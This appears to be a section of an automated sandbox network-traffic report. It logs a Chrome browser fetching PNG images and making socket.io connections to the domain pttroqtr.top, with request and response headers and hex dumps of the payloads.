                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<9IDATxOrF`d**K+LD9D>A*2N#S5m"i_S#T~?oW'B qqqBBBB


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            82192.168.2.5498088.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC361OUTGET /help/layout/images/40.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 10746
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"29fa-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:36 UTC10746INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 29 87 49 44 41 54 78 da ec dd 3d 76 db 56 c2 06 60 4c ce 77 ce 94 56 56 60 a5 72 29 4d e5 d2 f4 0a ac 94 53 99 5e 81 95 15 98 5e 41 e4 15 98 ae a6 8c bc 02 53 a5 ab 48 a5 ab c8 2b 18 a9 9c ca 1f 2e 71 19 d1 b2 7e f0 73 2f 00 52 cf 73 0e e3 4c c6 12 41 10 b8 78 ef ff 3f be 7d fb 56 00 00 b0 59 7e 72 0a 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<)IDATx=vV`LwVV`r)MS^^ASH+.q~s/RsLAx?}VY~r888!!!@@@88


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            83192.168.2.5498128.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC380OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjc6P HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 118
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:37 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 64 72 41 71 75 52 4b 6d 48 4c 6f 47 50 76 4d 63 41 45 66 34 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                            Data Ascii: 0{"sid":"drAquRKmHLoGPvMcAEf4","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            84192.168.2.5498118.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC549OUTGET /socket.io/?EIO=4&transport=websocket&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: Upgrade
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Upgrade: websocket
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-WebSocket-Version: 13
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Sec-WebSocket-Key: jemgbiASOcZ7yvJee6QQsg==
                                                                                                                                                                                            Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                            2024-09-28 03:39:37 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:37 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            85192.168.2.5498108.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P8sjcF_&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC2OUTData Raw: 34 30
                                                                                                                                                                                            Data Ascii: 40
                                                                                                                                                                                            2024-09-28 03:39:37 UTC198INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:37 UTC2INData Raw: 6f 6b
                                                                                                                                                                                            Data Ascii: ok


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            86192.168.2.5498138.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjcG1&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 32
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:37 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 6b 31 2d 71 70 79 6a 69 38 53 46 68 53 30 65 35 41 45 66 35 22 7d
                                                                                                                                                                                            Data Ascii: 40{"sid":"k1-qpyji8SFhS0e5AEf5"}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            87192.168.2.5498158.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC361OUTGET /help/layout/images/42.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 12814
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"320e-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:37 UTC12814INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 31 9b 49 44 41 54 78 da ec dd 4d 76 db 46 be 37 60 f8 3d 77 6e dd 15 88 bd 02 29 d3 4c cc ac c0 ca a8 87 a6 57 60 65 05 a6 57 10 79 05 a6 87 19 85 5e 81 a9 49 4f 43 ad 20 f4 0a ae b4 02 bf f8 5b 85 36 ad 48 22 3e 0a 24 28 3e cf 39 6c a5 2d 91 04 0a 1f f5 43 55 a1 f0 ec eb d7 af 05 00 00 fb e5 ff 29 02 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<1IDATxMvF7`=wn)LW`eWy^IOC [6H">$(>9l-CU)!!!@@@8888!!


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            88192.168.2.5498148.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC599OUTGET /help/layout/images/46.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 44008
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"abe8-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:37 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 ab 75 49 44 41 54 78 da ec bd 07 9c 64 65 95 bf ff bd 95 73 e8 1c a6 c3 e4 04 13 c8 41 60 08 8a 0a 4a 10 cc 0a 98 70 55 74 8c ab 6b 42 d7 8f eb ae ba 80 fe 95 dd fd ad 0b 6c 02 13 49 85 c5 48 4e ce 30 03 0c 30 c0 84 ee 9e 9e ce d5 dd 55 5d 39 fe df f3 d6 bd d5 b7 aa ab 7b 7a 66 3a 54 77 9f 67 3e 35 15 ba e2 ad 1b 9e 3a e7 3d e7 55 72 b9 1c 18 86 61 18 86 61 98 85 85 c2 12 c7 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 2c 71 0c c3 30
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<uIDATxdesA`JpUtkBlIHN00U]9{zf:Twg>5:=Uraa0000100,q00,q0
                                                                                                                                                                                            2024-09-28 03:39:37 UTC16384INData Raw: 05 2b 34 4f 2e 76 ec c2 84 c9 b4 26 79 af b9 ff 39 00 cf a5 a7 63 74 70 a8 f0 7d d2 89 c6 7c e6 fe 22 64 78 1e d7 57 45 37 2e 6e bc bd 10 4b 1c b3 d8 02 17 0c b3 b8 56 e8 2d da 78 38 7d 1a d5 80 99 49 a5 1e 0b d6 ce 98 1c 7b 95 7f 83 8a 14 0d 6a 8c 3a 74 df 63 70 1f c5 81 9c 06 fe 1b 2b 74 b9 d7 fe 76 10 03 7f 7c aa 48 e0 72 ea 18 b9 ea f6 d6 a2 99 1d ca 41 51 39 c3 49 ab e0 fc ec 85 72 f6 05 bd c0 69 11 36 12 e0 c9 28 27 70 b2 65 c8 24 cb 37 3f eb 44 b1 c0 d1 e5 b1 c1 a1 c9 df a4 c5 84 8d ff fa 79 d4 6e dd 78 cc 02 27 d3 a8 7f d8 89 fa ce ec a2 d8 de e8 07 48 ee b9 d7 8b 85 5a 90 3e d4 07 e7 3c 57 db 96 6e fb f9 7e 91 ca 16 de 4b 32 2c 71 0c 53 a1 88 9d f4 79 e5 fa c3 cd d4 78 b8 63 c1 d5 49 83 ef f3 07 37 0b 45 28 c4 01 3f 78 a8 1b e6 df f7 56 ac 94 1d
                                                                                                                                                                                            Data Ascii: +4O.v&y9ctp}|"dxWE7.nKV-x8}I{j:tcp+tv|HrAQ9Iri6('pe$7?Dynx'HZ><Wn~K2,qSyxcI7E(?xV
                                                                                                                                                                                            2024-09-28 03:39:37 UTC11551INData Raw: 89 a2 cf 61 fe d4 65 08 8f 8c 16 05 2e 26 96 ef e8 57 ee 80 f9 86 df a2 a1 5b 99 d1 bf 65 72 d8 8a e2 6b 29 f4 95 0d 3f 7f 08 fe 1f 75 9f b0 44 09 ad d3 5c 38 56 41 e0 d4 12 81 93 75 fa 32 0a ec 5d 27 8e 1c 7a c3 42 c6 bf ff 50 49 46 29 0d 1d d2 30 6b d6 61 99 b1 cf ee 0a e6 e0 fa f4 3d c8 fe e4 21 b1 9e db e5 50 64 f7 13 77 c3 56 db 80 d6 cf ff 35 86 aa 60 58 35 7c 9e 03 06 87 55 ec cb 4e f8 5a d6 22 9b 88 61 f0 fe df 62 fc 83 b7 63 c5 af 06 8a 43 d3 2d 0f c7 91 bd e5 d7 42 e4 f2 75 75 29 c9 21 19 1e 82 b3 6d 35 c6 bd 86 59 fe ae 97 0e a5 e6 f2 df 77 96 38 86 25 8e 61 16 2a 85 21 d5 db cb b3 54 67 ab f0 2f 21 e7 c3 25 53 b2 c1 bd c3 ef 83 92 4a a1 ff e6 ff 45 dd 2f fb 4b a2 56 a4 69 75 8f c5 61 7a f7 cf 61 7b e9 18 3c b5 35 72 7e 5c 2a 1a 85 ed b5 6b e7
                                                                                                                                                                                            Data Ascii: ae.&W[erk)?uD\8VAu2]'zBPIF)0ka=!PdwV5`X5|UNZ"abcC-Buu)!m5Yw8%a*!Tg/!%SJE/KViuaza{<5r~\*k


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            89192.168.2.5498188.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC599OUTGET /help/layout/images/47.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 22730
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"58ca-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:37 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 58 57 49 44 41 54 78 da ec bd 0b 78 1b e7 79 e7 fb cd 05 03 0c 40 12 24 05 89 ba d1 a4 dd 24 72 1c db a4 e2 c6 71 62 a5 62 da 26 f5 ba 49 c4 34 49 63 e7 62 d3 9b 38 69 9b 36 96 db ee 49 da 93 1e d1 bb 39 db ee d3 9e b5 ec ee d3 cd 73 ec 56 b4 93 ad 9d cb 49 a4 b4 4d d5 34 5d 53 b1 95 5a be 89 f4 55 92 25 8b 14 75 a3 08 e2 42 02 98 01 e6 f2 9d ef 1b 0e 48 10 04 49 90 04 71 21 ff bf 47 a3 01 07 83 99 c1 cc 60 e6 37 ef fb 5d 04 4a 29 01 00 00 00 00 00 b5 85 88 5d 00 00 00 00 00 00 89
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<XWIDATxxy@$$rqbb&I4Icb8i6I9sVIM4]SZU%uBHIq!G`7]J)]
                                                                                                                                                                                            2024-09-28 03:39:37 UTC6657INData Raw: 49 b6 df 4f 04 ea cc 3e 36 34 65 32 d2 68 2a 29 b5 98 86 e0 a4 b3 27 e3 06 a9 0b 7a 88 e2 93 b2 02 1c 7f e7 db 33 5f 63 2f bf e6 1e b3 69 a9 b6 2c 21 a6 eb a2 6e 5a c2 a3 37 ff f6 ab 8f e2 d7 09 4a 24 56 7b 20 71 60 95 1e 14 4a 55 4b d5 a9 e0 e0 f6 cd 0a 8a 00 e9 54 97 f7 dc f1 ca 6d c9 84 f4 e3 68 44 69 1d 1f f3 46 27 62 9e 11 5d 93 34 76 43 cd 6a 9a aa 27 e2 11 4a 29 2f cf 45 42 cd 86 d3 d4 46 3a 23 86 4f 9e f1 6a 4f 3f e7 55 4f 0f 39 02 77 4f 85 05 8e 4b d0 be 45 04 8e 47 df 78 5f aa 7b 0b 08 cf 9c 14 71 4a 17 5a 0b ac 6a 30 e0 a3 cf 14 bb 5d 49 8d 7c b1 d0 f4 8d 4d 74 74 b1 cf be f3 f6 37 fa 5d b9 7b 28 77 7a 81 d4 6a 45 d3 aa 3b 6e 3b c1 2f 3c 5d 7c df b0 87 81 96 c6 a6 0c 69 0e 65 c2 3e d5 d6 78 bb 7b 57 2e ea e1 64 92 0e b3 d7 da 8d ef 34 82 72 4e
                                                                                                                                                                                            Data Ascii: IO>64e2h*)'z3_c/i,!nZ7J$V{ q`JUKTmhDiF'b]4vCj'J)/EBF:#OjO?UO9wOKEGx_{qJZj0]I|Mtt7]{(wzjE;n;/<]|ie>x{W.d4rN


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            90192.168.2.5498168.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:37 UTC361OUTGET /help/layout/images/44.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:37 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:37 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 17267
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"4373-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:37 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 9b 00 00 00 fe 08 06 00 00 00 ec d6 a8 a5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 43 08 49 44 41 54 78 5e ed 9d 07 78 5d 47 99 fe e9 b0 0b 2c 0b 5b 80 5d 76 61 97 0d a1 06 96 14 20 40 0a 81 40 0a a1 84 c0 d2 61 29 0b fc 69 09 65 e9 2d f4 b2 0b 59 fa 12 ca 12 42 e2 f4 84 f4 1e 77 5b 96 64 c9 2a 96 6d b9 48 2e b2 6c 4b b6 6c c9 b6 e4 99 ff f7 7e 67 ae 72 75 35 f7 de 99 73 cf 91 ee 95 de 5f 9e ef b1 e3 7b ce 9c 73 e6 cc 99 77 ca 37 df 3c c0 12 42 08 21 39 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92
                                                                                                                                                                                            Data Ascii: PNGIHDRsRGBgAMAapHYsodCIDATx^x]G,[]va @@a)ie-YBw[d*mH.lKl~gru5s_{sw7<B!9C!;B!C!;B!C!;B!C!
